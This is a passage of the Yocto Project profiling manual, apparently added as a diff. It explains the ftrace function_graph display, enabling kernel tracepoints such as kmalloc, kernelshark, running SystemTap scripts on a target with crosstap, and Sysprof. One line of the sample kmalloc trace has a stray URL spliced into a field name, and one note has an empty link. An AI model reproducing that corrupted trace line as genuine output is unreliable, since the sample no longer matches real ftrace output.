+   4)   kworker-74   =>    <idle>-0
+   ------------------------------------------
+
+   4)               |      finish_task_switch() {
+   4)               |        _raw_spin_unlock_irq() {
+   4)   0.100 us    |          sub_preempt_count();
+   4)   0.582 us    |        }
+   4)   1.105 us    |      }
+   4)   0.088 us    |      sub_preempt_count();
+   4) ! 100.066 us  |    }
+   .
+   .
+   .
+   3)               |  sys_ioctl() {
+   3)   0.083 us    |    fget_light();
+   3)               |    security_file_ioctl() {
+   3)   0.066 us    |      cap_file_ioctl();
+   3)   0.562 us    |    }
+   3)               |    do_vfs_ioctl() {
+   3)               |      drm_ioctl() {
+   3)   0.075 us    |        drm_ut_debug_printk();
+   3)               |        i915_gem_pwrite_ioctl() {
+   3)               |          i915_mutex_lock_interruptible() {
+   3)   0.070 us    |            mutex_lock_interruptible();
+   3)   0.570 us    |          }
+   3)               |          drm_gem_object_lookup() {
+   3)               |            _raw_spin_lock() {
+   3)   0.080 us    |              add_preempt_count();
+   3)   0.620 us    |            }
+   3)               |            _raw_spin_unlock() {
+   3)   0.085 us    |              sub_preempt_count();
+   3)   0.562 us    |            }
+   3)   2.149 us    |          }
+   3)   0.133 us    |          i915_gem_object_pin();
+   3)               |          i915_gem_object_set_to_gtt_domain() {
+   3)   0.065 us    |            i915_gem_object_flush_gpu_write_domain();
+   3)   0.065 us    |            i915_gem_object_wait_rendering();
+   3)   0.062 us    |            i915_gem_object_flush_cpu_write_domain();
+   3)   1.612 us    |          }
+   3)               |          i915_gem_object_put_fence() {
+   3)   0.097 us    |            i915_gem_object_flush_fence.constprop.36();
+   3)   0.645 us    |          }
+   3)   0.070 us    |          add_preempt_count();
+   3)   0.070 us    |          sub_preempt_count();
+   3)   0.073 us    |          i915_gem_object_unpin();
+   3)   0.068 us    |          mutex_unlock();
+   3)   9.924 us    |        }
+   3) + 11.236 us   |      }
+   3) + 11.770 us   |    }
+   3) + 13.784 us   |  }
+   3)               |  sys_ioctl() {
+
+As you can see, the function_graph display is much easier
+to follow. Also note that in addition to the function calls and
+associated braces, other events such as scheduler events are displayed
+in context. In fact, you can freely include any tracepoint available in
+the trace events subsystem described in the next section by simply
+enabling those events, and they'll appear in context in the function
+graph display. Quite a powerful tool for understanding kernel dynamics.
+
+Also notice that there are various annotations on the left hand side of
+the display. For example if the total time it took for a given function
+to execute is above a certain threshold, an exclamation point or plus
+sign appears on the left hand side. Please see the ftrace documentation
+for details on all these fields.
+
+The 'trace events' Subsystem
+----------------------------
+
+One especially important directory contained within the
+/sys/kernel/debug/tracing directory is the 'events' subdirectory, which
+contains representations of every tracepoint in the system. Listing out
+the contents of the 'events' subdirectory, we see mainly another set of
+subdirectories: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing# cd events
+   root@sugarbay:/sys/kernel/debug/tracing/events# ls -al
+   drwxr-xr-x   38 root     root             0 Nov 14 23:19 .
+   drwxr-xr-x    5 root     root             0 Nov 14 23:19 ..
+   drwxr-xr-x   19 root     root             0 Nov 14 23:19 block
+   drwxr-xr-x   32 root     root             0 Nov 14 23:19 btrfs
+   drwxr-xr-x    5 root     root             0 Nov 14 23:19 drm
+   -rw-r--r--    1 root     root             0 Nov 14 23:19 enable
+   drwxr-xr-x   40 root     root             0 Nov 14 23:19 ext3
+   drwxr-xr-x   79 root     root             0 Nov 14 23:19 ext4
+   drwxr-xr-x   14 root     root             0 Nov 14 23:19 ftrace
+   drwxr-xr-x    8 root     root             0 Nov 14 23:19 hda
+   -r--r--r--    1 root     root             0 Nov 14 23:19 header_event
+   -r--r--r--    1 root     root             0 Nov 14 23:19 header_page
+   drwxr-xr-x   25 root     root             0 Nov 14 23:19 i915
+   drwxr-xr-x    7 root     root             0 Nov 14 23:19 irq
+   drwxr-xr-x   12 root     root             0 Nov 14 23:19 jbd
+   drwxr-xr-x   14 root     root             0 Nov 14 23:19 jbd2
+   drwxr-xr-x   14 root     root             0 Nov 14 23:19 kmem
+   drwxr-xr-x    7 root     root             0 Nov 14 23:19 module
+   drwxr-xr-x    3 root     root             0 Nov 14 23:19 napi
+   drwxr-xr-x    6 root     root             0 Nov 14 23:19 net
+   drwxr-xr-x    3 root     root             0 Nov 14 23:19 oom
+   drwxr-xr-x   12 root     root             0 Nov 14 23:19 power
+   drwxr-xr-x    3 root     root             0 Nov 14 23:19 printk
+   drwxr-xr-x    8 root     root             0 Nov 14 23:19 random
+   drwxr-xr-x    4 root     root             0 Nov 14 23:19 raw_syscalls
+   drwxr-xr-x    3 root     root             0 Nov 14 23:19 rcu
+   drwxr-xr-x    6 root     root             0 Nov 14 23:19 rpm
+   drwxr-xr-x   20 root     root             0 Nov 14 23:19 sched
+   drwxr-xr-x    7 root     root             0 Nov 14 23:19 scsi
+   drwxr-xr-x    4 root     root             0 Nov 14 23:19 signal
+   drwxr-xr-x    5 root     root             0 Nov 14 23:19 skb
+   drwxr-xr-x    4 root     root             0 Nov 14 23:19 sock
+   drwxr-xr-x   10 root     root             0 Nov 14 23:19 sunrpc
+   drwxr-xr-x  538 root     root             0 Nov 14 23:19 syscalls
+   drwxr-xr-x    4 root     root             0 Nov 14 23:19 task
+   drwxr-xr-x   14 root     root             0 Nov 14 23:19 timer
+   drwxr-xr-x    3 root     root             0 Nov 14 23:19 udp
+   drwxr-xr-x   21 root     root             0 Nov 14 23:19 vmscan
+   drwxr-xr-x    3 root     root             0 Nov 14 23:19 vsyscall
+   drwxr-xr-x    6 root     root             0 Nov 14 23:19 workqueue
+   drwxr-xr-x   26 root     root             0 Nov 14 23:19 writeback
+
+Each one of these subdirectories
+corresponds to a 'subsystem' and contains yet again more subdirectories,
+each one of those finally corresponding to a tracepoint. For example,
+here are the contents of the 'kmem' subsystem: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing/events# cd kmem
+   root@sugarbay:/sys/kernel/debug/tracing/events/kmem# ls -al
+   drwxr-xr-x   14 root     root             0 Nov 14 23:19 .
+   drwxr-xr-x   38 root     root             0 Nov 14 23:19 ..
+   -rw-r--r--    1 root     root             0 Nov 14 23:19 enable
+   -rw-r--r--    1 root     root             0 Nov 14 23:19 filter
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 kfree
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmalloc
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmalloc_node
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmem_cache_alloc
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmem_cache_alloc_node
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmem_cache_free
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_alloc
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_alloc_extfrag
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_alloc_zone_locked
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_free
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_free_batched
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_pcpu_drain
+
+Let's see what's inside the subdirectory for a
+specific tracepoint, in this case the one for kmalloc: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing/events/kmem# cd kmalloc
+   root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# ls -al
+   drwxr-xr-x    2 root     root             0 Nov 14 23:19 .
+   drwxr-xr-x   14 root     root             0 Nov 14 23:19 ..
+   -rw-r--r--    1 root     root             0 Nov 14 23:19 enable
+   -rw-r--r--    1 root     root             0 Nov 14 23:19 filter
+   -r--r--r--    1 root     root             0 Nov 14 23:19 format
+   -r--r--r--    1 root     root             0 Nov 14 23:19 id
+
+The 'format' file for the
+tracepoint describes the event in memory, which is used by the various
+tracing tools that now make use of these tracepoint to parse the event
+and make sense of it, along with a 'print fmt' field that allows tools
+like ftrace to display the event as text. Here's what the format of the
+kmalloc event looks like: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# cat format
+   name: kmalloc
+   ID: 313
+   format:
+           field:unsigned short common_type;	offset:0;	size:2;	signed:0;
+           field:unsigned char common_flags;	offset:2;	size:1;	signed:0;
+           field:unsigned char common_preempt_count;	offset:3;	size:1;	signed:0;
+           field:int common_pid;	offset:4;	size:4;	signed:1;
+           field:int common_padding;	offset:8;	size:4;	signed:1;
+
+           field:unsigned long call_site;	offset:16;	size:8;	signed:0;
+           field:const void * ptr;	offset:24;	size:8;	signed:0;
+           field:size_t bytes_req;	offset:32;	size:8;	signed:0;
+           field:size_t bytes_alloc;	offset:40;	size:8;	signed:0;
+           field:gfp_t gfp_flags;	offset:48;	size:4;	signed:0;
+
+   print fmt: "call_site=%lx ptr=%p bytes_req=%zu bytes_alloc=%zu gfp_flags=%s", REC->call_site, REC->ptr, REC->bytes_req, REC->bytes_alloc,
+   (REC->gfp_flags) ? __print_flags(REC->gfp_flags, "|", {(unsigned long)(((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
+   gfp_t)0x20000u) | (( gfp_t)0x02u) | (( gfp_t)0x08u)) | (( gfp_t)0x4000u) | (( gfp_t)0x10000u) | (( gfp_t)0x1000u) | (( gfp_t)0x200u) | ((
+   gfp_t)0x400000u)), "GFP_TRANSHUGE"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | (( gfp_t)0x20000u) | ((
+   gfp_t)0x02u) | (( gfp_t)0x08u)), "GFP_HIGHUSER_MOVABLE"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
+   gfp_t)0x20000u) | (( gfp_t)0x02u)), "GFP_HIGHUSER"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
+   gfp_t)0x20000u)), "GFP_USER"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | (( gfp_t)0x80000u)), GFP_TEMPORARY"},
+   {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u)), "GFP_KERNEL"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u)),
+   "GFP_NOFS"}, {(unsigned long)((( gfp_t)0x20u)), "GFP_ATOMIC"}, {(unsigned long)((( gfp_t)0x10u)), "GFP_NOIO"}, {(unsigned long)((
+   gfp_t)0x20u), "GFP_HIGH"}, {(unsigned long)(( gfp_t)0x10u), "GFP_WAIT"}, {(unsigned long)(( gfp_t)0x40u), "GFP_IO"}, {(unsigned long)((
+   gfp_t)0x100u), "GFP_COLD"}, {(unsigned long)(( gfp_t)0x200u), "GFP_NOWARN"}, {(unsigned long)(( gfp_t)0x400u), "GFP_REPEAT"}, {(unsigned
+   long)(( gfp_t)0x800u), "GFP_NOFAIL"}, {(unsigned long)(( gfp_t)0x1000u), "GFP_NORETRY"},      {(unsigned long)(( gfp_t)0x4000u), "GFP_COMP"},
+   {(unsigned long)(( gfp_t)0x8000u), "GFP_ZERO"}, {(unsigned long)(( gfp_t)0x10000u), "GFP_NOMEMALLOC"}, {(unsigned long)(( gfp_t)0x20000u),
+   "GFP_HARDWALL"}, {(unsigned long)(( gfp_t)0x40000u), "GFP_THISNODE"}, {(unsigned long)(( gfp_t)0x80000u), "GFP_RECLAIMABLE"}, {(unsigned
+   long)(( gfp_t)0x08u), "GFP_MOVABLE"}, {(unsigned long)(( gfp_t)0), "GFP_NOTRACK"}, {(unsigned long)(( gfp_t)0x400000u), "GFP_NO_KSWAPD"},
+   {(unsigned long)(( gfp_t)0x800000u), "GFP_OTHER_NODE"} ) : "GFP_NOWAIT"
+
+The 'enable' file
+in the tracepoint directory is what allows the user (or tools such as
+trace-cmd) to actually turn the tracepoint on and off. When enabled, the
+corresponding tracepoint will start appearing in the ftrace 'trace' file
+described previously. For example, this turns on the kmalloc tracepoint: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# echo 1 > enable
+
+At the moment, we're not interested in the function tracer or
+some other tracer that might be in effect, so we first turn it off, but
+if we do that, we still need to turn tracing on in order to see the
+events in the output buffer: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing# echo nop > current_tracer
+   root@sugarbay:/sys/kernel/debug/tracing# echo 1 > tracing_on
+
+Now, if we look at the the 'trace' file, we see nothing
+but the kmalloc events we just turned on: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
+   # tracer: nop
+   #
+   # entries-in-buffer/entries-written: 1897/1897   #P:8
+   #
+   #                              _-----=> irqs-off
+   #                             / _----=> need-resched
+   #                            | / _---=> hardirq/softirq
+   #                            || / _--=> preempt-depth
+   #                            ||| /     delay
+   #           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION
+   #              | |       |   ||||       |         |
+          dropbear-1465  [000] ...1 18154.620753: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+            <idle>-0     [000] ..s3 18154.621640: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+            <idle>-0     [000] ..s3 18154.621656: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+   matchbox-termin-1361  [001] ...1 18154.755472: kmalloc: call_site=ffffffff81614050 ptr=ffff88006d5f0e00 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_KERNEL|GFP_REPEAT
+              Xorg-1264  [002] ...1 18154.755581: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
+              Xorg-1264  [002] ...1 18154.755583: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
+              Xorg-1264  [002] ...1 18154.755589: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
+   matchbox-termin-1361  [001] ...1 18155.354594: kmalloc: call_site=ffffffff81614050 ptr=ffff88006db35400 bytes_req=576 bytes_alloc=1024 gfp_flags=GFP_KERNEL|GFP_REPEAT
+              Xorg-1264  [002] ...1 18155.354703: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
+              Xorg-1264  [002] ...1 18155.354705: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
+              Xorg-1264  [002] ...1 18155.354711: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
+            <idle>-0     [000] ..s3 18155.673319: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+          dropbear-1465  [000] ...1 18155.673525: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+            <idle>-0     [000] ..s3 18155.674821: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+            <idle>-0     [000] ..s3 18155.793014: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+          dropbear-1465  [000] ...1 18155.793219: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+            <idle>-0     [000] ..s3 18155.794147: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+            <idle>-0     [000] ..s3 18155.936705: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+          dropbear-1465  [000] ...1 18155.936910: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+            <idle>-0     [000] ..s3 18155.937869: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+   matchbox-termin-1361  [001] ...1 18155.953667: kmalloc: call_site=ffffffff81614050 ptr=ffff88006d5f2000 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_KERNEL|GFP_REPEAT
+              Xorg-1264  [002] ...1 18155.953775: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
+              Xorg-1264  [002] ...1 18155.953777: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
+              Xorg-1264  [002] ...1 18155.953783: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
+            <idle>-0     [000] ..s3 18156.176053: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+          dropbear-1465  [000] ...1 18156.176257: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+            <idle>-0     [000] ..s3 18156.177717: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+            <idle>-0     [000] ..s3 18156.399229: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+          dropbear-1465  [000] ...1 18156.399434: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_http://rostedt.homelinux.com/kernelshark/req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+            <idle>-0     [000] ..s3 18156.400660: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+   matchbox-termin-1361  [001] ...1 18156.552800: kmalloc: call_site=ffffffff81614050 ptr=ffff88006db34800 bytes_req=576 bytes_alloc=1024 gfp_flags=GFP_KERNEL|GFP_REPEAT
+
+To again disable the kmalloc event, we need to send 0 to the enable file: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# echo 0 > enable
+
+You can enable any number of events or complete subsystems (by
+using the 'enable' file in the subsystem directory) and get an
+arbitrarily fine-grained idea of what's going on in the system by
+enabling as many of the appropriate tracepoints as applicable.
+
+A number of the tools described in this HOWTO do just that, including
+trace-cmd and kernelshark in the next section.
+
+.. admonition:: Tying it Together
+
+   These tracepoints and their representation are used not only by
+   ftrace, but by many of the other tools covered in this document and
+   they form a central point of integration for the various tracers
+   available in Linux. They form a central part of the instrumentation
+   for the following tools: perf, lttng, ftrace, blktrace and SystemTap
+
+.. admonition:: Tying it Together
+
+   Eventually all the special-purpose tracers currently available in
+   /sys/kernel/debug/tracing will be removed and replaced with
+   equivalent tracers based on the 'trace events' subsystem.
+
+.. _trace-cmd-kernelshark:
+
+trace-cmd/kernelshark
+---------------------
+
+trace-cmd is essentially an extensive command-line 'wrapper' interface
+that hides the details of all the individual files in
+/sys/kernel/debug/tracing, allowing users to specify specific particular
+events within the /sys/kernel/debug/tracing/events/ subdirectory and to
+collect traces and avoid having to deal with those details directly.
+
+As yet another layer on top of that, kernelshark provides a GUI that
+allows users to start and stop traces and specify sets of events using
+an intuitive interface, and view the output as both trace events and as
+a per-CPU graphical display. It directly uses 'trace-cmd' as the
+plumbing that accomplishes all that underneath the covers (and actually
+displays the trace-cmd command it uses, as we'll see).
+
+To start a trace using kernelshark, first start kernelshark: ::
+
+   root@sugarbay:~# kernelshark
+
+Then bring up the 'Capture' dialog by
+choosing from the kernelshark menu: ::
+
+   Capture | Record
+
+That will display the following dialog, which allows you to choose one or more
+events (or even one or more complete subsystems) to trace:
+
+.. image:: figures/kernelshark-choose-events.png
+   :align: center
+
+Note that these are exactly the same sets of events described in the
+previous trace events subsystem section, and in fact is where trace-cmd
+gets them for kernelshark.
+
+In the above screenshot, we've decided to explore the graphics subsystem
+a bit and so have chosen to trace all the tracepoints contained within
+the 'i915' and 'drm' subsystems.
+
+After doing that, we can start and stop the trace using the 'Run' and
+'Stop' button on the lower right corner of the dialog (the same button
+will turn into the 'Stop' button after the trace has started):
+
+.. image:: figures/kernelshark-output-display.png
+   :align: center
+
+Notice that the right-hand pane shows the exact trace-cmd command-line
+that's used to run the trace, along with the results of the trace-cmd
+run.
+
+Once the 'Stop' button is pressed, the graphical view magically fills up
+with a colorful per-cpu display of the trace data, along with the
+detailed event listing below that:
+
+.. image:: figures/kernelshark-i915-display.png
+   :align: center
+
+Here's another example, this time a display resulting from tracing 'all
+events':
+
+.. image:: figures/kernelshark-all.png
+   :align: center
+
+The tool is pretty self-explanatory, but for more detailed information
+on navigating through the data, see the `kernelshark
+website <https://kernelshark.org/Documentation.html>`__.
+
+.. _ftrace-documentation:
+
+ftrace Documentation
+--------------------
+
+The documentation for ftrace can be found in the kernel Documentation
+directory: ::
+
+   Documentation/trace/ftrace.txt
+
+The documentation for the trace event subsystem can also be found in the kernel
+Documentation directory: ::
+
+   Documentation/trace/events.txt
+
+There is a nice series of articles on using ftrace and trace-cmd at LWN:
+
+-  `Debugging the kernel using Ftrace - part
+   1 <http://lwn.net/Articles/365835/>`__
+
+-  `Debugging the kernel using Ftrace - part
+   2 <http://lwn.net/Articles/366796/>`__
+
+-  `Secrets of the Ftrace function
+   tracer <http://lwn.net/Articles/370423/>`__
+
+-  `trace-cmd: A front-end for
+   Ftrace <https://lwn.net/Articles/410200/>`__
+
+See also `KernelShark's documentation <https://kernelshark.org/Documentation.html>`__
+for further usage details.
+
+An amusing yet useful README (a tracing mini-HOWTO) can be found in
+``/sys/kernel/debug/tracing/README``.
+
+.. _profile-manual-systemtap:
+
+systemtap
+=========
+
+SystemTap is a system-wide script-based tracing and profiling tool.
+
+SystemTap scripts are C-like programs that are executed in the kernel to
+gather/print/aggregate data extracted from the context they end up being
+invoked under.
+
+For example, this probe from the `SystemTap
+tutorial <http://sourceware.org/systemtap/tutorial/>`__ simply prints a
+line every time any process on the system open()s a file. For each line,
+it prints the executable name of the program that opened the file, along
+with its PID, and the name of the file it opened (or tried to open),
+which it extracts from the open syscall's argstr.
+
+.. code-block:: none
+
+   probe syscall.open
+   {
+           printf ("%s(%d) open (%s)\n", execname(), pid(), argstr)
+   }
+
+   probe timer.ms(4000) # after 4 seconds
+   {
+           exit ()
+   }
+
+Normally, to execute this
+probe, you'd simply install systemtap on the system you want to probe,
+and directly run the probe on that system e.g. assuming the name of the
+file containing the above text is trace_open.stp: ::
+
+   # stap trace_open.stp
+
+What systemtap does under the covers to run this probe is 1) parse and
+convert the probe to an equivalent 'C' form, 2) compile the 'C' form
+into a kernel module, 3) insert the module into the kernel, which arms
+it, and 4) collect the data generated by the probe and display it to the
+user.
+
+In order to accomplish steps 1 and 2, the 'stap' program needs access to
+the kernel build system that produced the kernel that the probed system
+is running. In the case of a typical embedded system (the 'target'), the
+kernel build system unfortunately isn't typically part of the image
+running on the target. It is normally available on the 'host' system
+that produced the target image however; in such cases, steps 1 and 2 are
+executed on the host system, and steps 3 and 4 are executed on the
+target system, using only the systemtap 'runtime'.
+
+The systemtap support in Yocto assumes that only steps 3 and 4 are run
+on the target; it is possible to do everything on the target, but this
+section assumes only the typical embedded use-case.
+
+So basically what you need to do in order to run a systemtap script on
+the target is to 1) on the host system, compile the probe into a kernel
+module that makes sense to the target, 2) copy the module onto the
+target system and 3) insert the module into the target kernel, which
+arms it, and 4) collect the data generated by the probe and display it
+to the user.
+
+.. _systemtap-setup:
+
+systemtap Setup
+---------------
+
+Those are a lot of steps and a lot of details, but fortunately Yocto
+includes a script called 'crosstap' that will take care of those
+details, allowing you to simply execute a systemtap script on the remote
+target, with arguments if necessary.
+
+In order to do this from a remote host, however, you need to have access
+to the build for the image you booted. The 'crosstap' script provides
+details on how to do this if you run the script on the host without
+having done a build: ::
+
+   $ crosstap root@192.168.1.88 trace_open.stp
+
+   Error: No target kernel build found.
+   Did you forget to create a local build of your image?
+
+   'crosstap' requires a local sdk build of the target system
+   (or a build that includes 'tools-profile') in order to build
+   kernel modules that can probe the target system.
+
+   Practically speaking, that means you need to do the following:
+    - If you're running a pre-built image, download the release
+      and/or BSP tarballs used to build the image.
+    - If you're working from git sources, just clone the metadata
+      and BSP layers needed to build the image you'll be booting.
+    - Make sure you're properly set up to build a new image (see
+      the BSP README and/or the widely available basic documentation
+      that discusses how to build images).
+    - Build an -sdk version of the image e.g.:
+        $ bitbake core-image-sato-sdk
+    OR
+    - Build a non-sdk image but include the profiling tools:
+        [ edit local.conf and add 'tools-profile' to the end of
+          the EXTRA_IMAGE_FEATURES variable ]
+        $ bitbake core-image-sato
+
+   Once you've build the image on the host system, you're ready to
+   boot it (or the equivalent pre-built image) and use 'crosstap'
+   to probe it (you need to source the environment as usual first):
+
+      $ source oe-init-build-env
+      $ cd ~/my/systemtap/scripts
+      $ crosstap root@192.168.1.xxx myscript.stp
+
+.. note::
+
+   SystemTap, which uses 'crosstap', assumes you can establish an ssh
+   connection to the remote target. Please refer to the crosstap wiki
+   page for details on verifying ssh connections at
+   . Also, the ability to ssh into the target system is not enabled by
+   default in \*-minimal images.
+
+So essentially what you need to
+do is build an SDK image or image with 'tools-profile' as detailed in
+the ":ref:`profile-manual/profile-manual-intro:General Setup`" section of this
+manual, and boot the resulting target image.
+
+.. note::
+
+   If you have a build directory containing multiple machines, you need
+   to have the MACHINE you're connecting to selected in local.conf, and
+   the kernel in that machine's build directory must match the kernel on
+   the booted system exactly, or you'll get the above 'crosstap' message
+   when you try to invoke a script.
+
+Running a Script on a Target
+----------------------------
+
+Once you've done that, you should be able to run a systemtap script on
+the target: ::
+
+   $ cd /path/to/yocto
+   $ source oe-init-build-env
+
+   ### Shell environment set up for builds. ###
+
+   You can now run 'bitbake <target>'
+
+   Common targets are:
+            core-image-minimal
+            core-image-sato
+            meta-toolchain
+            meta-ide-support
+
+   You can also run generated qemu images with a command like 'runqemu qemux86-64'
+
+Once you've done that, you can cd to whatever
+directory contains your scripts and use 'crosstap' to run the script: ::
+
+   $ cd /path/to/my/systemap/script
+   $ crosstap root@192.168.7.2 trace_open.stp
+
+If you get an error connecting to the target e.g.: ::
+
+   $ crosstap root@192.168.7.2 trace_open.stp
+   error establishing ssh connection on remote 'root@192.168.7.2'
+
+Try ssh'ing to the target and see what happens: ::
+
+   $ ssh root@192.168.7.2
+
+A lot of the time, connection
+problems are due specifying a wrong IP address or having a 'host key
+verification error'.
+
+If everything worked as planned, you should see something like this
+(enter the password when prompted, or press enter if it's set up to use
+no password):
+
+.. code-block:: none
+
+   $ crosstap root@192.168.7.2 trace_open.stp
+   root@192.168.7.2's password:
+   matchbox-termin(1036) open ("/tmp/vte3FS2LW", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE, 0600)
+   matchbox-termin(1036) open ("/tmp/vteJMC7LW", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE, 0600)
+
+.. _systemtap-documentation:
+
+systemtap Documentation
+-----------------------
+
+The SystemTap language reference can be found here: `SystemTap Language
+Reference <http://sourceware.org/systemtap/langref/>`__
+
+Links to other SystemTap documents, tutorials, and examples can be found
+here: `SystemTap documentation
+page <http://sourceware.org/systemtap/documentation.html>`__
+
+.. _profile-manual-sysprof:
+
+Sysprof
+=======
+
+Sysprof is a very easy to use system-wide profiler that consists of a
+single window with three panes and a few buttons which allow you to
+start, stop, and view the profile from one place.
+
+.. _sysprof-setup:
+
+Sysprof Setup
+-------------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section.
+
+Sysprof is a GUI-based application that runs on the target system. For
+the rest of this document we assume you've ssh'ed to the host and will
+be running Sysprof on the target (you can use the '-X' option to ssh and
+have the Sysprof GUI run on the target but display remotely on the host
+if you want).
+
+.. _sysprof-basic-usage:
+
+Basic Sysprof Usage
+-------------------
+
+To start profiling the system, you simply press the 'Start' button. To
+stop profiling and to start viewing the profile data in one easy step,
+press the 'Profile' button.
+
+Once you've pressed the profile button, the three panes will fill up
+with profiling data:
+
+.. image:: figures/sysprof-copy-to-user.png
+   :align: center
+
+The left pane shows a list of functions and processes. Selecting one of
+those expands that function in the right pane, showing all its callees.
+Note that this caller-oriented display is essentially the inverse of
+perf's default callee-oriented callchain display.
+
+In the screenshot above, we're focusing on ``__copy_to_user_ll()`` and
+looking up the callchain we can see that one of the callers of
+``__copy_to_user_ll`` is sys_read() and the complete callpath between them.
+Notice that this is essentially a portion of the same information we saw
+in the perf display shown in the perf section of this page.
+
+.. image:: figures/sysprof-copy-from-user.png
+   :align: center
+
+Similarly, the above is a snapshot of the Sysprof display of a
+copy-from-user callchain.
+
+Finally, looking at the third Sysprof pane in the lower left, we can see
+a list of all the callers of a particular function selected in the top
+left pane. In this case, the lower pane is showing all the callers of
